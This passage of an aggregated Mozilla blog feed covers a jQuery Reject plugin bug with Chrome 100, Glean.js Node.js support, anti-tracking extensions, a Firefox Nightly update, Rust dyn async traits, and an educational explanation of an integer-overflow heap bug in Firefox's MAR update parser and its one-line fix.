In particular, we’re looking forward to taking part in the Writing Day on Sunday, October 3, where we’ll be joining our friends from Open Web Docs (OWD) to work on MDN content updates together. We’re planning to invite our fellow conference attendees to take part in making open source documentation. OWD is also sponsoring Write the Docs; read their announcement to learn more.

The post MDN Web Docs at Write the Docs Prague 2021 appeared first on Mozilla Hacks - the Web developer blog.

Mike TaylorHow to delete your jQuery Reject Plugin in 1 easy step.

In my last post on testing Chrome version 100, I encouraged everyone to flip on that flag and report bugs. It’s with a heavy heart that I announce that Ian Kilpatrick did so, and found a bug.

(⌣_⌣”)

The predictable bug is that parks.smcgov.org will tell you your browser is out of date, and recommend that you upgrade it via a modal straight out of the year 2009.

screenshot of a modal telling you to upgrade your browser, with a farmville image because that was popular in 2009?

(Full Disclosure: I added the FarmVille bit so you can get back into a 2009 headspace, don’t sue me Zynga).

The bug is as follows:

r.versionNumber = parseFloat(r.version, 10) || 0;
var minorStart = 1;

if (r.versionNumber < 100 && r.versionNumber > 9) {
  minorStart = 2;
}

r.versionX = r.version !== x ? r.version.substr(0, minorStart) : x;
r.className = r.name + r.versionX;

Back when this was written, a version 100 was unfathomable (or more likely, the original authors were looking forward to the chaos of “a world already dealing with the early effects of climate change, and now we have to deal with this?”, a mere 11 years later), so the minorStart offset approach was perhaps reasonable.

There’s a few possible fixes here, as I see it:

I. Kick the can down the road a bit more:

if (r.versionNumber < 1000 && r.versionNumber > 99) {
  minorStart = 3;
}

I don’t really plan on being alive when Chrome 999 comes out, so.

II. Kick the can down the road like, way further:

r.versionX = Math.trunc(parseFloat(r.version)) || x;

According to jakobkummerow, this should work until browsers hit version 9007199254740991 (aka Number.MAX_SAFE_INTEGER in JS).

III. (Recommended) Just remove this script entirely from your site. It’s outlived its purpose.

Also, if you happen to work on any of the following 1936 sites using this script, you know what to do (pick option Roman numeral 3, just to be super clear).

Data@MozillaThis Week in Glean: Announcement: Glean.js v0.19.0 supports Node.js

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)


From the start, the Glean JavaScript SDK (Glean.js) was conceptualized as a JavaScript telemetry library for diverse JavaScript environments. When we built the proof-of-concept, we tested that idea out and created a library that worked in Qt/QML apps, websites, web extensions, Node.js servers and CLIs, and Electron apps.

However, the stakes are completely different when implementing a proof-of-concept library versus a library to be used in production environments. Whereas for the proof-of-concept we wanted to try out as many platforms as possible, for the actual Glean.js library we want to minimize unnecessary work and focus on perfecting the features our users will actively benefit from. In practice, that meant that up until a few weeks ago Glean.js supported only browser extensions and Qt/QML apps. Today, it also supports Node.js environments.

🎉 (Of course, it’s always exciting to implement new features).

If you would also like to start using Glean.js in your Node.js project today, check out the “Adding Glean to your JavaScript project” guide over in the Glean book, but note that there is one caveat: the Node.js implementation does not contain persistent storage, which means every time the app is restarted the state is reset and Glean runs as if it were the first run ever of the app. In the spirit of not implementing things that are not required, we spoke to the users that requested Node.js support and concluded that for their use case persistent storage was not necessary. If your use case does require that, leave a comment over on Bug 1728807 and we will re-prioritize that work.

:brizental

Firefox Add-on ReviewsTop anti-tracking extensions

The truth of modern tracking is that it happens in so many different and complex ways it’s practically impossible to ensure absolute tracking protection. But that doesn’t mean we’re powerless against personal data harvesters attempting to trace our every online move. There are a bunch of browser extensions that can give you tremendous anti-tracking advantages… 

Privacy Badger

Sophisticated and effective anti-tracker that doesn’t require any setup whatsoever. Simply install Privacy Badger and right away it begins the work of finding the most hidden types of trackers on the web. 

Privacy Badger actually gets better at tracker blocking the more you use it. As you naturally navigate around the web and encounter new types of hidden trackers, Privacy Badger will find and block them, without relying on externally maintained block lists or other methods that may lag behind the latest trends in sneaky tracking. Privacy Badger also automatically removes tracking codes from outgoing links on Facebook and Google. 

Decentraleyes

Another strong privacy protector that works well right out of the box, Decentraleyes effectively halts web page tracking requests from reaching third party content delivery networks (i.e. ad tech). 

A common issue with other extensions that try to block tracking requests is they also sometimes break the page itself, which is obviously not a great outcome. Decentraleyes solves this unfortunate side effect by injecting inert local files into the request, which protects your privacy (by distributing generic data instead of your personal info) while ensuring web pages don’t break in the process. Decentraleyes is also designed to work well with other types of content blockers like ad blockers.

ClearURLs

Ever noticed those long tracking codes that often get tagged onto the end of your search result links or URLs on product pages from shopping sites? All that added gunk in the URL is designed to track how you interact with the link. ClearURLs automatically removes the tracking clutter from links—giving you cleaner links and more privacy. 

Other key features include…

  • Clean up multiple URLs at once
  • Block hyperlink auditing (i.e. “ping tracking”; a method websites use to track clicks)
  • Block ETag tracking (i.e. “entity tags”; a tracking alternative to cookies)
  • Prevent Google and Yandex from rewriting search results to add tracking elements
  • Block some common ad domains (optional)

Disconnect

Disconnect is a strong privacy tool that fares well against hidden trackers used by some of the biggest players in the game, like Google, Facebook, and Twitter. It also provides the benefit of significantly speeding up page loads, simply by virtue of blocking all the unwanted tracking traffic. 

Once installed, you’ll find a Disconnect button in your browser toolbar. Click it when visiting any website to see the number of trackers blocked (and where they’re from). You can also opt to unblock anything you feel you might need in your browsing experience. 

Cookie AutoDelete

Take control of your cookie trail with Cookie AutoDelete. Set it so cookies are automatically deleted every time you close a tab, or create safelists for select sites whose cookies you want to preserve. 

After installation, you must enable “Auto-clean” for the extension to automatically wipe away cookies. This is so you first have an opportunity to create a custom safelist, should you choose, before accidentally clearing away cookies you might want to keep. 

There’s not much you have to do once you’ve got your safelist set, but clicking the extension’s toolbar button opens a pop-up menu with a few convenient options, like the ability to wipe away cookies from open tabs or clear cookies for just a particular domain.

<figcaption>Cookie AutoDelete’s pop-up menu gives you accessible cookie control wherever you go online. </figcaption>

Firefox Multi-Account Containers

Do you need to be simultaneously logged in to multiple accounts on the same platform, say for instance juggling various accounts on Google, Twitter, or Reddit? Multi-Account Containers can make your life a whole lot easier by helping you keep your many accounts “contained” in separate tabs so you can easily navigate between them without a need to constantly log in/out. 

By isolating your identities through containers, your browsing activity from one container isn’t correlated to another—making it far more difficult for these platforms to track and profile your holistic browsing behavior. 

Facebook Container

Does it come as a surprise that Facebook tries to track your online behavior beyond the confines of just Facebook? If so, I’m sorry to be the bearer of bad news. Facebook definitely tries to track you outside of Facebook. But with Facebook Container you can put a privacy barrier between the social media giant and your online life outside of it. 

Facebook primarily investigates your interests outside of Facebook through the various widgets you find embedded ubiquitously around the web (e.g. “Like” buttons or Facebook comments on articles, social share features, etc.) 

<figcaption>Social widgets like these give Facebook and other platforms a sneaky means of tracking your interests around the web.</figcaption>

The privacy trade we make for the convenience of not needing to sign in to Facebook on each visit (because it recognizes your browser as yours) is that we give Facebook a potent way to track our moves around the web, since it can tell when you visit any web page embedded with its widgets. 

Facebook Container basically allows you the best of both worlds—you can preserve the convenience of not needing to sign in/out of Facebook, while placing a “container” around your Facebook profile so the company can’t follow you around the web anymore.

We hope one of these anti-tracker extensions provides you with a strong new layer of security. Feel free to explore more powerful privacy extensions on addons.mozilla.org

Firefox NightlyThese Weeks in Firefox: Issue 101

Highlights

    • We have begun to roll out Fission to a fraction of users on the release channel! Here’s a reminder of what Fission is, and why it matters
      • Telemetry so far doesn’t show any problems with stability or performance. We’re keeping an eye on it.
    • Fluent milestone 1 is 100% completed! All DTDs have been removed from browser.xhtml!
        • A burndown chart for strings in browser.xhtml, showing no remaining DTDs left.
    • A new group of students from Michigan State University are working on improvements to High Contrast Mode. See the High Contrast Mode section below for details. Thanks to Noah, Shao, Danielle, Avi, and Jack!
    • about:processes is a page you can visit to see which Firefox processes are taking up power and memory on your machine
      • It’s now possible to record a performance profile for a process with only a single click from within about:processes!
      • Here’s an animated GIF demonstrating an example workflow of one-click profiling
    • The new tab redesign has officially graduated. The pref to enable the pre-89 design has been removed.
    • Experimental improvements to macOS video power consumption will land soon in bug 1653417.
      • Fullscreen YouTube video on macOS consumes only 80% of the power it otherwise would.
      • We’re looking for testers! Flip gfx.core-animation.specialize-video to test. We’re looking specifically for visual glitches in the video or its controls. We’d also like to confirm that power usage is reduced for fullscreen YouTube and Twitch videos.

Friends of the Firefox team

Introductions/Shout-outs

    • [mconley] Welcome Yasmin Shash and Hanna Jones!
    • [vchin] Welcome to Amir who has started as Desktop Integrations EM!

For contributions from September 8th to September 21st 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

    • Antonin Loubiere
    • Itiel

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

WebExtensions Framework

Downloads Panel

Fluent

    • Milestone 1 has been completed! All DTDs have been removed from browser.xhtml!
      • As a bonus, this also means that all DTDs have been removed from the startup path, which was a goal for Milestone 2!
      • Are We Fluent Yet?
      • Congratulations to Katherine and Niklas for finally getting us over this milestone!

Form Autofill

High-Contrast Mode (MSU Capstone project)

Lint, Docs and Workflow

macOS Spotlight

    • Window spotlight buttons will now be on the correct side in RTL builds: bugs 1633860 & 1419375.
    • We noticed some users unfamiliar with macOS conventions were running Firefox directly from its DMG file. This can result in data loss and slow startup times, since Firefox is not fully installed. We now show a message warning the user in this scenario (bug 516362).

New Tab Page

    • New tab redesign has officially graduated. Old design pref & related code removed. Bug 1710937 👏
    • CSS variables simplified & cleaned up, allowing for easier theming (bugs 1727319, 1726432, 1727321)
    • The ntp_text theme API property was broken, and now it isn’t! (bug 1713778)

Nimbus / Experiments

    • Bug 1730924 We want to update the Ajv JSON schema validator in tree

Password Manager

PDFs & Printing

Performance

    • Gijs has filed some bugs to make process flipping less likely when Fission is enabled
    • We’ve been seeing a slow but steady decline in the percentage of clients on Nightly seeing tab switch spinners. This might be related to Fission, WebRender, hardware churn, or might be a measurement artifact due to old builds sending telemetry. We’re not sure.
    • Thanks to jstutte for landing a patch that removes some main thread IO during startup when checking if we need to be doing an LMDB migration!

Performance Tools

    • Thanks to our contributor, mhansen, Linux perf profiles now include different colors for kernel vs user stack frames.
    • Two side-by-side images of performance profiles; the right side now has bright colors.

Proton

Search and Navigation

    • Firefox Suggest is a new feature we’re working on to help you find the best of the web more quickly and easily!
    • Drew enabled the Firefox Suggest offline scenario for en-* users in the US region and made some tweaks to the Address Bar preferences UI
    • Daisuke fixed a regression where the Address Bar was not providing switch-tab results when history results were disabled – Bug 1477895

Screenshots

Niko MatsakisDyn async traits, part 1

Over the last few weeks, Tyler Mandry and I have been digging hard into what it will take to implement async fn in traits. Per the new lang team initiative process, we are collecting our design thoughts in an ever-evolving website, the async fundamentals initiative. If you’re interested in the area, you should definitely poke around; you may be interested to read about the MVP that we hope to stabilize first, or the (very much WIP) evaluation doc which covers some of the challenges we are still working out. I am going to be writing a series of blog posts focusing on one particular thing that we have been talking through: the problem of dyn and async fn. This first post introduces the problem and the general goal that we are shooting for (but don’t yet know the best way to reach).

What we’re shooting for

What we want is simple. Imagine this trait, for “async iterators”:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

We would like you to be able to write a trait like that, and to implement it in the obvious way:

struct SleepyRange {
    start: u32,
    stop: u32,
}

impl AsyncIter for SleepyRange {
    type Item = u32;
    
    async fn next(&mut self) -> Option<Self::Item> {
        tokio::sleep(1000).await; // just to await something :)
        let s = self.start;
        if s < self.stop {
            self.start = s + 1;
            Some(s)
        } else {
            None
        }
    }
}

You should then be able to have a Box<dyn AsyncIter<Item = u32>> and use that in exactly the way you would use a Box<dyn Iterator<Item = u32>> (but with an await after each call to next, of course):

let b: Box<dyn AsyncIter<Item = u32>> = ...;
let i = b.next().await;

Desugaring to an associated type

Consider this running example:

trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

Here, the next method will desugar to a fn that returns some kind of future; you can think of it like a generic associated type:

trait AsyncIter {
    type Item;

    type Next<'me>: Future<Output = Self::Item> + 'me;
    fn next(&mut self) -> Self::Next<'_>;
}

The corresponding desugaring for the impl would use type alias impl trait:

struct SleepyRange {
    start: u32,
    stop: u32,
}

// Type alias impl trait:
type SleepyRangeNext<'me> = impl Future<Output = u32> + 'me;

impl AsyncIter for SleepyRange {
    type Item = u32;

    type Next<'me> = SleepyRangeNext<'me>;
    fn next(&mut self) -> SleepyRangeNext<'_> {
        async move {
            tokio::sleep(1000).await;
            let s = self.start;
            ... // as above
        }
    }
}

This desugaring works quite well for standard generics (or impl Trait). Consider this function:

async fn process<T>(t: &mut T) -> u32
where
    T: AsyncIter<Item = u32>,
{
    let mut sum = 0;
    while let Some(x) = t.next().await {
        sum += x;
        if sum > 22 {
            break;
        }
    }
    sum
}

This code will work quite nicely. For example, when you call t.next(), the resulting future will be of type T::Next. After monomorphization, the compiler will be able to resolve <SleepyRange as AsyncIter>::Next to the SleepyRangeNext type, so that the future is known exactly. In fact, crates like embassy already use this desugaring, albeit manually and only on nightly.

Associated types don’t work for dyn

Unfortunately, this desugaring causes problems when you try to use dyn values. Today, when you have dyn AsyncIter, you must specify the values for all associated types defined in AsyncIter. So that means that instead of dyn AsyncIter<Item = u32>, you would have to write something like

for<'me> dyn AsyncIter<
    Item = u32, 
    Next<'me> = SleepyRangeNext<'me>,
>

This is clearly a non-starter from an ergonomic perspective, but it has an even more pernicious problem. The whole point of a dyn trait is to have a value where we don’t know what the underlying type is. But specifying the value of Next<'me> as SleepyRangeNext means that there is exactly one impl that could be in use here. This dyn value must be a SleepyRange, since no other impl has that same future.

Conclusion: For dyn AsyncIter to work, the future returned by next() must be independent of the actual impl. Furthermore, it must have a fixed size. In other words, it needs to be something like Box<dyn Future<Output = u32>>.

How the async-trait crate solves this problem

You may have used the async-trait crate. It resolves this problem by not using an associated type, but instead desugaring to Box<dyn Future> types:

trait AsyncIter {
    type Item;

    fn next(&mut self) -> Box<dyn Future<Output = Self::Item> + Send + '_>;
}

This has a few disadvantages:

  • It forces a Box all the time, even when you are using AsyncIter with static dispatch.
  • The type as given above says that the resulting future must be Send. For other async fns, we use auto traits to analyze automatically whether the resulting future is Send (it is Send if it can be, in other words; we don’t declare up front whether it must be).

Conclusion: Ideally we want Box when using dyn, but not otherwise

So far we’ve seen:

  • If we desugar async fn to an associated type, it works well for generic cases, because we can resolve the future to precisely the right type.
  • But it doesn’t work well for dyn trait, because the rules of Rust require that we specify the value of the associated type exactly. For dyn traits, we really want the returned future to be something like Box<dyn Future>.
    • Using Box does mean a slight performance penalty relative to static dispatch, because we must allocate the future dynamically.

What we would ideally want is to only pay the price of Box when using dyn:

  • When you use AsyncIter in generic types, you get the desugaring shown above, with no boxing and static dispatch.
  • But when you create a dyn AsyncIter, the future type becomes Box<dyn Future<Output = u32>>.
    • (And perhaps you can choose another “smart pointer” type besides Box, but I’ll ignore that for now and come back to it later.)

In upcoming posts, I will dig into some of the ways that we might achieve this.

Mozilla Attack & DefenseFixing a Security Bug by Changing a Function Signature

Or: The C Language Itself is a Security Risk, Exhibit #958,738

This post is aimed at people who are developers but who do not know C or low-level details about things like sign extension. In other words, if you’re a seasoned pro and you eat memory safety vulnerabilities for lunch, then this will all be familiar territory for you; our goal here is to dive deep into how integer overflows can happen in real code, and to break the topic down in detail for people who aren’t as familiar with this aspect of security.

The Bug

In July of 2020, I was sent Mozilla bug 1653371 (later assigned CVE-2020-15667). The reporter had found a segfault due to heap overflow in the library that parses MAR files1, which is the custom package format that’s used in the Firefox/Thunderbird application update system. So that doesn’t sound great. (spoiler: it isn’t as bad as it sounds because that overflow happens after the MAR file has had its signature validated already)

The Fix

The patch I wrote for this bug consists entirely of changing one function signature in a C source file from this:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

to this:

static int mar_insert_item(MarFile* mar, const char* name, uint32_t namelen,
                           uint32_t offset, uint32_t length, uint32_t flags)

I swear that is the entire patch. All I had to do was change the type of one of this function’s parameters from int to uint32_t. Can that change really fix a security bug? It can, and it did, and I’ll explain how. We have some background to cover first, though.

Background

The problem here comes down to numbers and how computers work with them, so let’s talk a bit about that first2. Since the bug is in a file written in the C language, our discussion will be from that perspective, but I am going to try to explain things so that you don’t need to know C or much at all about low-level programming in order to understand what happened.

Binary Numbers

Any number that your computer is going to work with has to be stored in terms of binary bits. The way those work isn’t as complicated as it might seem.

Think about how you write a number in decimal digits using place value. If we want to write the number one thousand, three hundred, and twelve, we need four digits: 1,312. What does each one of those digits mean? Well the rightmost 2 means… 2. But the 1 next to that doesn’t mean 1, it means 10. You take the digit itself and multiply that by 10 to get the value that’s being represented there. And then as you go through the rest of the digits, you go up by another power of 10 for each one. The 3 doesn’t mean either 3 or 30, it means 300, because it’s being multiplied by 100. And the leftmost 1 gets multiplied by 1000.

Guess what? Binary numbers work the same way. The only difference is that, since binary has only two different digits, 0 and 1, it doesn’t make any sense to use powers of 10; there’d be loads of numbers we couldn’t write, since anything greater than 1 but less than 10 couldn’t be represented. So instead of that, we use powers of 2. Each successive digit isn’t multiplied by 1, 10, 100, 1000, etc., it’s multiplied by 1, 2, 4, 8, etc.

Let’s look at a couple of examples. Here’s the number twelve in binary: 1100. Why? Well, let’s do the same thing we did with our decimal example, multiply each digit. I’ll write out the whole thing this time:

1100
│││└─ 0 x (2 ^ 0) = 0 x 1 = 0
││└── 0 x (2 ^ 1) = 0 x 2 = 0
│└─── 1 x (2 ^ 2) = 1 x 4 = 4
└──── 1 x (2 ^ 3) = 1 x 8 = 8

0 + 0 + 4 + 8 = 12

There we go! We got 12. For each digit, we multiply its value by the power of 2 for that place value location (and the multiplication is pretty darn easy, because the only digits are 0 and 1), and then add up all those results. That’s it!
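
If you’d like to watch a program do that same digit-by-digit decoding, here is a minimal C sketch (my own illustration, not code from the bug) that prints a number’s bits by checking each place value from the top down:

#include <stdio.h>

int main(void) {
    unsigned char n = 12;
    /* Walk the place values from 2^7 down to 2^0 and print a 1
       wherever that power of 2 is present in the number. */
    for (int place = 7; place >= 0; place--) {
        printf("%d", (n >> place) & 1);
    }
    printf("\n"); /* prints 00001100: our 1100, with leading zeroes */
    return 0;
}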

Binary Addition

Now, what if we need to do some math? That’s pretty much all computers are any good at, after all. Let’s say we want to add something to a binary number.

Well, we know how to do that in decimal: you add up each digit starting from the lowest one and carry over into the next digit if necessary. If you read the last section, you can probably guess what I’m about to say: that’s exactly what you do in binary too. Except again it’s even easier, because there are only two different digits.

Let’s have another simple example, 13 + 12. First we have to write both of those numbers in binary; we already know 12 is 1100, so 13 should just be one more than that, 1101. We’ll add them up the same way we add decimal numbers by hand:

  1100
+ 1101
------
 ?????

The first two digits are easy, 0 + 1 = 1, and 0 + 0 = 0.

  1100
+ 1101
------
 ???01

But now we have 1 + 1. Where do we go with that? There’s no 2. Well, just like in decimal, we have to carry out of that digit; the sum of 1 and 1 in binary is 10 (because that’s just binary for 2), so that means we need to write a 0 in that column and carry the 1.

  1
  1100
+ 1101
------
 ??001

Only one digit to go. Again, it’s 1 + 1, but now we have a 1 carried over from the previous digit. So really we have to do 1 + 1 + 1, which is 3 but in binary that’s 11. This is the last column now, so we don’t have to worry about carries anymore, we can just write that down:

  1
  1100
+ 1101
------
 11001

And we’re done! 1100 + 1101 = 11001. And to prove we got the right answer, let’s convert 11001 back to decimal, the same way we did before:

11001
││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││└── 0 x (2 ^ 2) = 0 x  4 =  0
│└─── 1 x (2 ^ 3) = 1 x  8 =  8
└──── 1 x (2 ^ 4) = 1 x 16 = 16

1 + 0 + 0 + 8 + 16 = 25

So now we know we were right; 12 + 13 = 25, and 1100 + 1101 = 11001. That’s how you add numbers in binary.
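
That column-by-column carry procedure is exactly what an adder circuit implements. Here is the same algorithm in C (an illustration, not code from the MAR library): XOR adds each column without carries, AND-then-shift computes the carries, and we loop until no carries remain.

#include <stdio.h>

/* Add two numbers using only bitwise operations,
   mirroring the by-hand method above. */
unsigned int add(unsigned int a, unsigned int b) {
    while (b != 0) {
        unsigned int carry = (a & b) << 1; /* columns that carry out */
        a = a ^ b;                         /* column sums, without carries */
        b = carry;                         /* add the carries on the next pass */
    }
    return a;
}

int main(void) {
    printf("%u\n", add(12, 13)); /* prints 25, i.e. 1100 + 1101 = 11001 */
    return 0;
}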

Signed Integers and Two’s Complement

So far we’ve only talked about positive numbers, but that’s not all computers can handle; sometimes you also need negative numbers. But you don’t want every number to potentially be negative; a lot of the kinds of things that you need to keep track of in a program just cannot possibly be negative, and sometimes (as we’ll see) allowing certain things to be negative can be actively harmful.

So, computers (and many languages, including C) provide two different kinds of integers that the programmer can select between whenever they need an integer: “signed” or “unsigned”. “Signed” means that the number can be either negative or positive (or zero), and “unsigned” means it can only be positive (or zero)3.

What we’ve been talking about up to now are unsigned integers, so how do signed integers work? To start with, the first bit of the number isn’t part of the number itself anymore, it’s now the “sign bit”. If the sign bit is 0, the number is nonnegative (either zero or positive), and if the sign bit is 1, the number is negative. But, when the sign bit is 1, we need a couple extra steps to convert between binary and decimal. Here’s the procedure.

  1. Discard the sign bit before doing anything else.
  2. Invert all the other bits in the number, meaning make every 1 a 0 and vice versa.
  3. Convert that binary number (the one with the bits flipped) to decimal the usual way.
  4. Add 1 to that result.

This operation, with the inversion and the adding 1, is called “two’s complement”, and it’ll get you the value of the negative number. Let’s go through another simple example.

Let’s say we have a signed 8-bit integer and the value is 11010110. What is that in decimal? Well, we see right away that the sign bit is set, so we need to take the two’s complement. First, we need to flip all the bits except the sign bit, so that gets us 0101001. Now we convert that to decimal and add 1.

0101001
││││││└ 1 x (2 ^ 0) = 1 x  1 =  1
│││││└─ 0 x (2 ^ 1) = 0 x  2 =  0
││││└── 0 x (2 ^ 2) = 0 x  4 =  0
│││└─── 1 x (2 ^ 3) = 1 x  8 =  8
││└──── 0 x (2 ^ 4) = 0 x 16 =  0
│└───── 1 x (2 ^ 5) = 1 x 32 = 32
└────── 0 x (2 ^ 6) = 0 x 64 =  0

1 + 0 + 0 + 8 + 0 + 32 + 0 = 41

41 + 1 = 42

Now just remember to add back the negative sign, and we get -42. That’s our number! 11010110 interpreted as a signed integer is -42.
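
You can watch the computer perform this same reinterpretation. In this C sketch (illustrative only), we store the bit pattern 11010110 (which is 214 as an unsigned number) and then read it back as a signed 8-bit integer. Strictly speaking, converting an out-of-range value to a signed type is implementation-defined in C, but every mainstream platform uses two’s complement and gives the result shown below.

#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint8_t bits = 214;              /* the bit pattern 11010110 */
    int8_t as_signed = (int8_t)bits; /* implementation-defined in C, but
                                        two's complement in practice */
    printf("unsigned: %u\n", (unsigned)bits); /* 214 */
    printf("signed:   %d\n", as_signed);      /* -42 */
    return 0;
}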

Why?

Why do we bother with any of this? Why not do something simple like have the sign bit and then just the regular number4? Well, the two’s complement representation has one huge advantage: you can completely disregard it while doing basic arithmetic. The exact same hardware and logic can do arithmetic on both unsigned numbers and signed two’s complement numbers5. That means the hardware is simpler, which means it’s smaller, cheaper, and faster. That mattered more in the early days of digital computers, which is why two’s complement caught on as the standard, and it’s still with us today.

Sign Extension

There’s one other neat trick two’s complement lets us do that we need to talk about. Integers in computers have a fixed “width”, or number of bits that are used to represent them. Wider integers can represent larger (or more negative) numbers, but take up more space in the computer’s memory. So to balance those concerns, languages like C give the programmer access to a few different bit widths to choose from for their integers.

So, what happens if we need to do some arithmetic between integers that are different widths, or just pass an integer into a function that’s narrower than the function expects? We need a way to make an integer wider. If it’s unsigned, that’s easy; copy over the same value into the lower (right-hand) bits and then fill in the new high bits with 0’s, and you’ll have the same value, just now with more bits.

But what if we need to widen a signed integer? Two’s complement’s here to save the day with a solution called “sign extension”. It turns out all we have to do to make a two’s complement integer wider is copy over the same value into the low bits and then fill in the new high bits with copies of the sign bit. That’s it.

It’s easy to see why that’s correct if we think about how two’s complement works. If the number is positive (the sign bit is 0), then it’s the same as for an unsigned number, we’ll fill in the new space with all zeroes and nothing changes. And if the number is negative (the sign bit is 1), then we’ll fill in the new space with 1 bits, but the two’s complement operation means those bits all get inverted into 0’s when we need to get the number’s value, so still nothing changes. These simple, efficient operations are why two’s complement is so neat, despite seeming weird and overcomplicated at first.
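
Here is a small C illustration of both widening rules (again, my own sketch rather than code from the bug): the unsigned value zero-extends and the signed value sign-extends, and both keep their original meaning.

#include <stdio.h>
#include <stdint.h>

int main(void) {
    int8_t narrow_signed = -42;    /* 8 bits:  11010110 */
    uint8_t narrow_unsigned = 214; /* the same 8 bits, read as unsigned */

    int32_t wide_signed = narrow_signed;      /* sign-extend: 11111111 ... 11010110 */
    uint32_t wide_unsigned = narrow_unsigned; /* zero-extend: 00000000 ... 11010110 */

    printf("%d\n", wide_signed);   /* still -42 */
    printf("%u\n", wide_unsigned); /* still 214 */
    return 0;
}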

Hexadecimal Numbers

I’m going to use a few hexadecimal numbers in this article, but don’t worry, I’m not going to try to teach you how to work in a whole different number system yet again. You can think of hexadecimal as a shorthand for binary numbers. Hexadecimal (“hex” for short) uses the decimal digits 0-9 and also the letters A-F, for 16 possible digits total. Since each digit can have 16 values, each one can stand in for four binary digits.

Also, hex numbers in C and elsewhere are written starting with 0x. That’s not part of the number, it’s just telling you that the thing after it is written in hex so that you know how to read it.

You don’t need to know how to do any arithmetic directly on hex numbers or anything like that; just see how they convert to binary bits. Here are the conversions of individual hex digits to binary bits:

Binary  Hex
======  ===
 0000    0
 0001    1
 0010    2
 0011    3
 0100    4
 0101    5
 0110    6
 0111    7
 1000    8
 1001    9
 1010    A
 1011    B
 1100    C
 1101    D
 1110    E
 1111    F
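
To see the shorthand in action, here’s a tiny C sketch (my own) that prints the same value both ways; each hex digit of 0x2A maps to one row of the table above (2 is 0010, A is 1010):

#include <stdio.h>

int main(void) {
  int n = 0x2A;                   /* hex 2A = binary 00101010 */
  printf("%d\n", n);              /* prints 42 */
  for (int i = 7; i >= 0; i--)    /* print the low 8 bits, high bit first */
    putchar((n >> i) & 1 ? '1' : '0');
  putchar('\n');                  /* prints 00101010 */
  return 0;
}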

Implicit Conversions in C

In C, unlike some languages, there are a bunch of different types that represent different ways of storing numbers; basically, every kind and size of number that CPUs can work with has its own type in C. There’s also a “default” integer type, which is called int. How many bits are in an int depends on the C compiler you’re using (and on its settings)6, but it is guaranteed by the language standard to be signed.

Since C has so many different kinds of numbers, it’s common to need to convert between them. It’s so common in fact that the language designers decided to make those conversions mostly automatic. That means that, for instance, this code compiles and runs as you’d probably expect:

#include <math.h> // to get the declaration for sqrt()

long long geometric_mean(int a, int b) {
  // a * b is computed as an int, converted to double to call sqrt(),
  // and then sqrt()'s double result is converted to long long on return
  return sqrt(a * b);
}

int main() {
  int a = 42;
  long b = 13;
  // the long is converted to int going into geometric_mean(), and the
  // long long it returns is converted to double for the assignment
  double mean = geometric_mean(a, b);
  return mean; // and the double is converted back to int here
}

Even though none of the types in that code match up at all, the compiler just makes everything work for us. Nice of it, eh? These automatic “fixes” are called implicit conversions, and the rules for how they work are long and not always very intuitive. This is a pretty major gotcha of C programming because it happens without the programmer even seeing it; you just have to know these things are happening and realize all the implications.
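
To give a taste of how unintuitive these rules can get, here’s a classic example (mine, not related to the bug yet): comparing a signed and an unsigned int implicitly converts the signed side to unsigned first, with a surprising result.

#include <stdio.h>

int main(void) {
  int s = -1;
  unsigned int u = 1;
  /* before comparing, -1 is implicitly converted to unsigned int,
     which turns it into the largest possible unsigned value */
  if (s < u)
    printf("-1 < 1, as you'd expect\n");
  else
    printf("surprise: -1 is not less than 1 here\n");  /* this one prints */
  return 0;
}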

How the Bug Works

That should be all the background we need to understand what went wrong here. Now, let’s have another look back at that original, unpatched function declaration:

static int mar_insert_item(MarFile* mar, const char* name, int namelen,
                          uint32_t offset, uint32_t length, uint32_t flags)

The first two parameters are an internal data structure and a text string; they aren’t relevant here. But after that we see an int parameter, which is meant to contain the length of the string parameter (in C, strings don’t know their own length; the programmer has to keep track of that if they need it).

A few lines into the mar_insert_item function, we find this call:

memcpy(item->name, name, namelen + 1);

I’ll explain what this line is for before we move on. The mar_insert_item function is part of a procedure that reads the index of all the files contained in the MAR package (it’s kind of like a ZIP file, it can contain a bunch of different files and compress them all, and you can extract the whole thing or just individual files). mar_insert_item is called repeatedly, once for each compressed file, and each call adds one entry to the index that’s being gradually built up. This specific line just copies the file’s name into that index entry; memcpy of course is short for “memory copy”, and its parameters are the destination to copy to (which is the name field of the item we’re adding to our index), the source to copy from (the name string that was passed into mar_insert_item in the first place), and the amount of memory that needs to be copied, in bytes. That last parameter is where everything goes wrong.

What do you think would happen if mar_insert_item is called with namelen set to the highest positive value it can store, which is 0x7fffffff? Well then, in this one line of code, the program does all of these things:

  1. A 1 gets added to namelen7. But I just said namelen already has the highest positive value it can store, so something has to give. The C language standard doesn’t define what happens in this case, but in practice what you get on most computers is… the addition just happens anyway. So we get the value 0x80000000. But namelen is a signed integer, and that value has its sign bit set! We’ve added 1 to a positive number and it transformed into a negative number. -2,147,483,648 to be precise8. Computers are weird. And we’re not even done yet.
  2. memcpy takes a 64-bit value, so our temporary value has to get extended from 32 bits to 64. That means a sign extension; we take the most significant bit, which is a 1, and copy it into 32 new bits, getting us the value 0xFFFFFFFF80000000. Remember, sign extension preserves the two’s complement value, so the decimal version of that number is still -2,147,483,648, it didn’t change during this step.
  3. The length parameter that memcpy takes is also supposed to be unsigned, so now that the value has been extended to 64 bits, we take those bits and interpret them as an unsigned number. We no longer have -2,147,483,648, we now have positive 18,446,744,071,562,067,968. As a byte length, that’s over 18 million terabytes9. Fair to say that’s more bytes than we could have really meant to be copying here.
  4. Finally, memcpy is called, and it starts trying to copy from name into item->name. But because of that sign extension and unsigned reinterpretation, we can see that it’s going to try to copy waaaaay more bytes than are actually there. So what memcpy ends up doing is copying all the bytes that are there (memcpy does its best for us even when we feed it junk), and then… crashing the program.

And that’s the bug; the updater crashes right here.
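
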